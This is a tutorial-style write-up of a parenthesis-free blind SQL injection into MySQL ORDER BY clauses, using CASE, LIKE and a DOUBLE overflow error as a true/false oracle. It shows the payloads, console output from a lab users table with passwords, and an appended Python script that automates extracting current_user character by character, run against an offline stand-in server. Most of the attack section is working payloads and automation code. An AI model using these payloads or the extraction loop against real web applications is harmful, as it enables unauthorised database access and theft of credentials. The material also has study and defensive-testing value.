0x00 Overview
An injection method for when parentheses ("()") are not allowed in the payload. The injected text goes into an ORDER BY clause: a CASE expression needs no parentheses, and CURRENT_USER (unlike USER()) can be referenced without them, so it is the value probed here.
id-case when 1 like 1 then 0 else 2*1e308 end
When the condition is true the sort key is id-0 and the page renders as usual; when it is false the branch evaluates 2*1e308, which is out of range for DOUBLE and raises an error.
0x01 Test data
mysql> select user();
+----------------+
| user()         |
+----------------+
| root@localhost |
+----------------+
1 row in set (0.00 sec)

mysql> select current_user;
+----------------+
| current_user   |
+----------------+
| root@localhost |
+----------------+
1 row in set (0.00 sec)
0x02 Testing
Note:
Combining LIKE with a time delay (SLEEP) causes a full-table evaluation: the ORDER BY expression is computed once for every row, so the delay is multiplied by the row count.
For example:
the tdb_goods table holds 23 rows
delay of 0.1 s per row
0.1 * 23 = 2.3 s, so the response is delayed by 2.3 s in total. Avoid doing this; the error/no-error oracle used below does not have this cost.
// Condition true
// The original data is returned and the page is unchanged
mysql> select * from users order by id-case when 1 like 1 then 0 else 2*1e308 end;
+----+----------+------------+
| id | username | password   |
+----+----------+------------+
|  1 | Dumb     | Dumb       |
|  2 | Angelina | I-kill-you |
|  3 | Dummy    | p@ssword   |
|  4 | secure   | crappy     |
|  5 | stupid   | stupidity  |
|  6 | superman | genious    |
|  7 | batman   | mob!le     |
|  8 | admin    | admin      |
|  9 | admin1   | admin1     |
| 10 | admin2   | admin2     |
| 11 | admin3   | admin3     |
| 12 | dhakkan  | dumbo      |
| 14 | admin4   | admin4     |
+----+----------+------------+
13 rows in set (0.00 sec)
// Probing current_user, condition true
// The original data is returned and the page is unchanged, which tells us the first character of current_user is "r"
mysql> select * from users order by id-case when current_user like 'r%' then 0 else 2*1e308 end;
+----+----------+------------+
| id | username | password   |
+----+----------+------------+
|  1 | Dumb     | Dumb       |
|  2 | Angelina | I-kill-you |
|  3 | Dummy    | p@ssword   |
|  4 | secure   | crappy     |
|  5 | stupid   | stupidity  |
|  6 | superman | genious    |
|  7 | batman   | mob!le     |
|  8 | admin    | admin      |
|  9 | admin1   | admin1     |
| 10 | admin2   | admin2     |
| 11 | admin3   | admin3     |
| 12 | dhakkan  | dumbo      |
| 14 | admin4   | admin4     |
+----+----------+------------+
13 rows in set (0.00 sec)
// Condition false
// The page throws an error; if error display is turned off, the page comes back with no data instead
mysql> select * from users order by id-case when current_user like 's%' then 0 else 2*1e308 end;
ERROR 1690 (22003): DOUBLE value is out of range in '(2 * 1e308)'
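The page only shows one manual probe ('r%'). The following is an added example, not code from the original post, that turns that probe into a full character-by-character extraction loop while keeping the same constraint: no parentheses anywhere in the injected text. The names (PAYLOAD, CHARSET, extract, make_fake_oracle) and the offline stand-in for the vulnerable page are my own assumptions; in practice the oracle function would issue the HTTP request and return True when the page renders normally and False when it errors or comes back empty. It also handles the LIKE wildcard edge case: once a recovered prefix contains "_" or "%", it has to be escaped, or the next probe matches any character.

```python
import re
import string

# Sort-key skeleton from the page.
#   condition true  -> id-0, the page renders normally
#   condition false -> 2*1e308 overflows DOUBLE, ERROR 1690 (or an empty page)
PAYLOAD = "id-case when current_user like '{pattern}' then 0 else 2*1e308 end"

# Characters tried at each position (assumption: lowercase target; MySQL LIKE
# under the default *_ci collation is case-insensitive anyway).
CHARSET = string.ascii_lowercase + string.digits + "@._-"


def like_escape(s):
    """Escape LIKE wildcards inside an already-recovered prefix; an unescaped
    '_' or '%' would otherwise match anything on the next probe."""
    return s.replace("%", "\\%").replace("_", "\\_")


def build_payload(prefix):
    """Pattern = known prefix + '%', i.e. 'does current_user start with prefix?'"""
    return PAYLOAD.format(pattern=like_escape(prefix) + "%")


def confirm(oracle, value):
    """Exact match (no trailing %) to check the loop stopped at the real end."""
    return oracle(PAYLOAD.format(pattern=like_escape(value)))


def extract(oracle, charset=CHARSET, max_len=64):
    """oracle(payload) -> True if the page rendered normally, False on error or
    empty page. One request per candidate character; SUBSTR/ASCII would need
    parentheses, so a LIKE prefix walk is the only stepping primitive left."""
    known = ""
    while len(known) < max_len:
        for c in charset:
            if oracle(build_payload(known + c)):
                known += c
                break
        else:
            break  # no character extends the prefix: end of the string
    return known


# --- offline stand-in for the vulnerable page (constructed for testing) ---

def mysql_like(value, pattern):
    """Minimal model of MySQL LIKE: % and _ are wildcards, backslash escapes
    them, matching is case-insensitive like the default collation."""
    regex, i = "", 0
    while i < len(pattern):
        ch = pattern[i]
        if ch == "\\" and i + 1 < len(pattern):
            regex += re.escape(pattern[i + 1])
            i += 2
            continue
        regex += ".*" if ch == "%" else "." if ch == "_" else re.escape(ch)
        i += 1
    return re.fullmatch(regex, value, re.IGNORECASE | re.DOTALL) is not None


def make_fake_oracle(secret):
    """Pretend server: pulls the LIKE pattern back out of the payload and
    answers True (page OK) or False (DOUBLE out of range / empty page)."""
    def oracle(payload):
        m = re.search(r"like '((?:[^'\\]|\\.)*)'", payload)
        return mysql_like(secret, m.group(1))
    return oracle


if __name__ == "__main__":
    # "root@localhost" is the value seen in the page's test data
    fake = make_fake_oracle("root@localhost")
    found = extract(fake)
    print(found, confirm(fake, found))
```

Cost is linear in the charset size per character (about len * |CHARSET| requests), because without parentheses there is no SUBSTR/ASCII to binary-search on. A literal backslash in the target would need a second level of escaping (once for the string literal, once for LIKE), which this helper does not attempt.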
